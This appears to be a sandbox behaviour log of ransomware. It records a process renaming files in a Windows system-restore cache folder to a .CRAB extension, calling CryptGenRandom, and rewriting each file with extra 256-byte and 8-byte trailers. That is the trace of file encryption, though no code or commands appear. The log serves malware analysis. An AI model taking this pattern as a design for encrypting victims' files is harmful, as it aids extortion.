File Create filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{425865B3-1A09-4BE3-8A97-1BAFFDA74ED0}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{51296D62-5AA5-412E-9A8F-ABE77CD15E9E}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{5AC56584-2304-47B9-B262-8D3164A52D9E}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{77AC2C2C-D323-4D07-BBBC-9F6908DE6F91}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{7A521DBE-9658-44E5-843C-29DD5C50D136}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8000FFCD-1DA9-461E-A8A6-B9C248869570}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{8002C55B-B05C-402E-B80D-41CEAD61F984}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
